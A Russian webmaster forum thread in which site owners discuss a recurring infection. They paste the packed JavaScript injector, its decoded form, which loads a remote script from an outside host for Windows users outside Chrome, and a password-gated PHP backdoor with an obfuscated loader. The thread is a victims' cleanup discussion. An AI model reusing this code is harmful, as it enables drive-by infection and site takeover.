- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Ну как то же это нашли =)
Ну а вы посмотрите на этот код. Явно это не вся закладка.
Тут просто преобразования, но ничего не запускается. В другом файле должен быть еще код. Его не нашли.
А если папку от записи закрыть - не пролезет со вставкой злоумышленник
Так он уже пролез раньше.
Между прочим, я реальный сценарий описываю. Такое случается.
Так именно для этого и советую установить движок по новой и закрыть папки. Тогда код может остаться только в папке с темой, которую необходимо досконально проверить. Конечно злоумышленники бывают хитрее, но с такими и бороться надо по- другому... Уже если не поможет перестановка движка, надо думать...
Так именно для этого и советую установить движок по новой и закрыть папки. Тогда код может остаться только в папке с темой, которую необходимо досконально проверить
Так именно для этого я и советую не проверять, а переустановить и тему тоже.
Нет там никакого полета уникальной фантазии дизайнера.
Все скопировано и чуть-чуть изменено. А значит может быть скопировано еще раз.
Я просто не сразу Вас понял. Все верно. Хотя смотря откуда тема скачана. Главное чтобы там уже кода не было...
В общем, вчера удалил это все, сегодня снова на месте: в uploads/posts в разных папках сидели conn.js и rusty.swf, а также в engine/classes/js/ в этот раз дописка в jqueryui.js ... :) Может еще где-что есть, пока не знаю.
Если кто умеет скрипты расшифровывать, может подскажете что выполняет этот код? (код из js-файлов, которые подсаживает вирус)
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l 11(A){10(m.17&&m.1v){2 Z=m["1r"+"2z"+"2u"+"2P"+"2c"+"27"](\'2j\')[0];2 u=m.17(\'2A\');2 2k="I)%`0?];y-6!}U+P?*";2 2i="k#7~g;2g-!5";2 2h="v?[2l~~`[/2m";2 2q="!+y(U@2p<]2o#N";2 2n="j`2e~C~`2d$";u.F(\'25\',"t"+"e"+"24/"+"21"+"1Y"+"1Z"+"i"+"26");u.F(\'A\',A);2 2b="! )+29{i$U}g";2 28="M &14!E&{^";2 2r="[]?%}+.2s~/^7+#";2 2K="2J:.2I<2G~`2H`Y*Q`";2 2L="2M,.~2Q!2O$2N#2F";Z["a"+"2x"+"e"+"2w"+"C"+"2v"+"2t"](u)}}l 18(){D 12.2y()}2 2D="!!!M:2C`2B(`1X{6";2 2R="#1O>1q!*<=`-[/:}o!`1p";2 1o="!%1m&~@1n?5#)(1s";2 1w="P=~4).1l~22#1t^ S>1x";2 1b="1g}%p(p;,9.z}1c.";l 15(d){D d.O(L)!=-1}2 1k="S 1h%&;8+:1$6";2 1j="S!1i^7{?1%n:";2 1u="1W~E-3m/1P;1y";2 1N="*1M.}P,1Q";2 1R="1V-1U:1T:!";2 19="1S"+"1L"+":/"+"/o"+"1K"+"1D"+"1C"+".p"+"p."+"d"+"/5"+"38"+"T"+"1B"+"B"+"1z"+"1A"+"1E"+"1F"+"31"+"1J"+"B"+"1d"+"1I"+"1H"+"1a"+"2S"+"H"+"1G"+"2E"+"X"+"40"+"3f"+"3Q"+"20"+"R"+"38"+"3S"+"x"+"3T"+"3c"+"J"+"W"+"J"+"3U"+"3e"+"3N"+"16"+"3F"+"3I"+"14"+"2f"+"3M"+"3Y"+"x"+"3K"+"3X"+"4a"+"49"+"48"+"4b"+"46"+"45"+"23"+"47"+"V"+"42"+"H"+"V"+"3Z"+"3L"+"3D"+"W"+"2a"+"39"+"44"+"3a"+"R"+"1e"+"3h"+"1a"+"B"+"3g"+"35"+"x"+"x"+"34"+"33"+"2W"+"2V"+"2U"+"1f"+"2T"+"2a"+"2X"+"2Y"+"32"+"30"+"T"+"2Z"+"20"+"3i"+"2a"+"3w"+"3y"+"3z"+"3C"+"3B"+"3A"+"f";2 L="w"+"3u";2 3t="[[3l))f~3k";2 3o="6}3s[.;}G&";2 3q="3b+b!<X-*z=/3r=3p[s}?3";2 3n="@r/-4:(q?4.3v 3x 3j;o";2 3d="3}3E< :36~37?%#41;43+P";l 13(d){D d.O("c"+"h"+"3J"+"3G")==-1}l K(){2 d=12["3H"]["3O"+"3V"+"3W"+"r"+"3P"+"3R"]();10(13(d)&&15(d)&&18()){11(19)}}K();',62,260,'||var|||||||||||ua||||||||function|document||||||||script_tag|||b7|||src|b1||return||setAttribute||7a||a2|includeCounter|win|||indexOf|||ac||7e||50|76|e0||head_tag|if|includeJavascript|navigator|notChrome||isWin||createElement|cond3|url||ZVKpaplM4|vS||||_e_|3_LMI|wE|SRyxyZhC1|SRyxyZhC0|Om36|yb|rh3|ZVKpaplM2|uSS|lG0I|get|u0|9_|SRyxyZhC2|getElementsByTagName|ZVKpaplM3|k3A|iRS|f0|f9|c5|le|ly|67|cc|51|7c|9f|01|la|tp|2N_1|SRyxyZhC3|U7u|i7|YAI9|SRyxyZhC4|ht|C60|fXmu|k9|xrr|6k|va|scr||ja|||xt|type|pt|ame|FBmEvxI1|JZ||FBmEvxI0|TagN|_2dit|wX||HDs99hR|JpHMjsU2|JpHMjsU1|head|JpHMjsU0|8P|IO|JpHMjsU4|hvu|eg|JpHMjsU3|FBmEvxI2|HlzwK|ld|ents|hi|nd|pp|javaEnabled|Elem|script|o8|Pxp8|ZVKpaplM0|d6|iq|KP|X55|TP|b7a|FBmEvxI3|FBmEvxI4|6d5|U4R|51Oj_|By|l_q|ZVKpaplM1|ed|d1|91|cf|e3|b4|ff|e6|9a||72|0e|97||vp1o2|rm9||ae|a8|h3||cUFPNG4|||6f|f4|64|ay7|160|o87Dr||cUFPNG3|cUFPNG1|feS|cUFPNG2|uE|t49|cUFPNG0|in|_7|81|_o|92|b5|99|f8|0c|ea|7O|9e|me|userAgent|c9|ro|a7|84|c1|d7|to|Ca|8a|se|73|70|eb|Lo|we|59|bd|09||A53|62|Qz||83|d8||5e|7f|f2|aa'.split('|'),0,{}))Bener, а какая вам разница, если его все равно нужно удалить ?
В общем, вчера удалил это все, сегодня снова на месте: в uploads/posts в разных папках сидели conn.js и rusty.swf, а также в engine/classes/js/ в этот раз дописка в jqueryui.js ... :) Может еще где-что есть, пока не знаю.
Еще ищи php файл. Если посмотреть в логах он вызывается методом POST по времени совпадает с остальными (js swf). У меня компания из 3 файлов (php swf js) + один из js файлов имеет вредоносную строчку.
Да... и еще. Если раньше php файл имел код такого вида:
if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
То теперь он такой (я его укоротил, он очень огромный, там идет что-то зашифровано). Тут какой-то пароль... чем его декодировать?
.chr(110).chr(102).chr(108).chr(97)
.chr(116).chr(101).chr(40).chr(98).chr(97).chr(115).chr(101).
chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39)."7X1re9pG0/Dn5lesVVp...../Ag==\x27\x29\x29\x29\x3b",".");
Bener, а какая вам разница, если его все равно нужно удалить ?
Ну вдруг если расшифровать коды js и php, то мы поймём что это за вирус хотя бы. Тут нужен знающий человек, разбирающийся в программировании. А то пока воз и ныне там, никаких сподвижек в решении проблемы. Вирус продолжает безчинствовать...
---------- Добавлено 17.12.2013 в 13:55 ----------
В общем через спец.сервисы для декодирования скриптов расшифровал код вирусного js, вот так код выглядит в отформатированном виде:
function includeJavascript(src) {
if (document.createElement && document.getElementsByTagName) {
var head_tag = document["get" + "Elem" + "ents" + "By" + "TagN" + "ame"]('head')[0];
var script_tag = document.createElement('script');
var UbKrJupg0 = "?@34l^x$46";
var UbKrJupg1 = "L0zk&*1,e_;H<BE*J";
var UbKrJupg2 = "$-A#4_$%O2}";
var UbKrJupg3 = "&$<-]t368$^:%?*";
var UbKrJupg4 = "QTV[C}P-~%+)w_x=?=!PX}";
script_tag.setAttribute('type', "t" + "e" + "xt/" + "ja" + "va" + "scr" + "i" + "pt");
script_tag.setAttribute('src', src);
var tHpwoAu0 = ";g9?zgsd^7?,i";
var tHpwoAu1 = "DYRFEhN() 4}{";
var tHpwoAu2 = "_x*,)dfi]cciN-~";
var tHpwoAu3 = "N^lu(,?[;/+Y1G"; var tHpwoAu4 = "3+%{4o)IVv5x1Mk6dEChJGfrJ";
head_tag["a" + "pp" + "e" + "nd" + "C" + "hi" + "ld"](script_tag)
}
}
function cond3() {
return navigator.javaEnabled()
}
var zYenOhARw0 = "@{+&4{.@$TZ6sUJM*0n";
var zYenOhARw1 = "6P<%T[5#;e!L~q#8{2]";
var zYenOhARw2 = ")D}~4-90/!shuQ2";
var zYenOhARw3 = "}L1@~#I- h3!!`~<";
var zYenOhARw4 = "6/E;sx#s}>/9wI*pJ>+J";
function isWin(ua) {
return ua.indexOf(win) != -1
}
var rzMACRgZJT0 = "9cjo)<e)@0 l}";
var rzMACRgZJT1 = "/d<f9#5~=pPl";
var rzMACRgZJT2 = "t8+}GoK-yhfAqm%";
var rzMACRgZJT3 = "~>{$cAVk:*_zTQ!";
var rzMACRgZJT4 = ",tp<,Qd{e9^/T?";
var url = "ht" + "tp" + ":/" + "/y" + "da" + "xy" + "ko" + ".p" + "p." + "ua" + "/2" + "6c" + "2e" + "8e" + "59" + "08" + "e7" + "84" + "51" + "f8" + "23" + "0b" + "f5" + "1a" + "94" + "6d" + "74" + "91" + "51" + "fa" + "ea" + "b9" + "75" + "09" + "c2" + "39" + "b4" + "1b" + "94" + "94" + "3e" + "03" + "3c" + "35" + "73" + "ec" + "da" + "d9" + "9e" + "e0" + "67" + "8a" + "5c" + "e4" + "83" + "10" + "d9" + "f9" + "61" + "e9" + "e0" + "b8" + "cf" + "61" + "91" + "34" + "bd" + "45" + "41" + "13" + "9e" + "28" + "32" + "40" + "49" + "55" + "2b" + "84" + "a3" + "eb" + "54" + "14" + "51" + "0b" + "e5" + "fa" + "41" + "93" + "9f" + "2a" + "73" + "fe" + "16" + "25" + "f7" + "d0" + "22" + "f7" + "6e" + "23" + "32" + "48" + "51" + "36" + "87" + "9f" + "27" + "36" + "c0" + "66" + "05" + "7a" + "d9" + "07" + "0d" + "5b" + "39" + "f0" + "e4" + "3a" + "36" + "35" + "3e" + "02" + "70" + "28" + "df" + "4b" + "f8" + "db" + "ef" + "39" + "e3" + "e6" + "e5" + "05" + "ac";
var win = "w" + "in";
var OzygqXdg0 = "+?<F#X-U5`j";
var OzygqXdg1 = "Dfw(,#&IC*$";
var OzygqXdg2 = "L_q6S*Pbr-*^b>/";
var OzygqXdg3 = " ][8b$K 6*3Z^8+";
var OzygqXdg4 = "}Y.;SV$w/0#8f~1,";
function notChrome(ua) {
return ua.indexOf("c" + "h" + "ro" + "me") == -1
}
function includeCounter() {
var ua = navigator["userAgent"]["to" + "Lo" + "we" + "r" + "Ca" + "se"]();
if (notChrome(ua) && isWin(ua) && cond3()) {
includeJavascript(url)
}
}
includeCounter();
Ну вдруг если расшифровать коды js и php, то мы поймём что это за вирус хотя бы
Во-первых, не поймете.
Во-вторых, это не обязательно вирус, а может быть ручная работа. Другого такого случая может не быть и искать аналогию не с чем.
Тут нужен знающий человек, разбирающийся в программировании.
В этом программисты не обязаны разбираться. Программисты вам написали как все зачистить.
В этом будут разбираться судебные эксперты, если конечно у вас хватит денег довести до суда.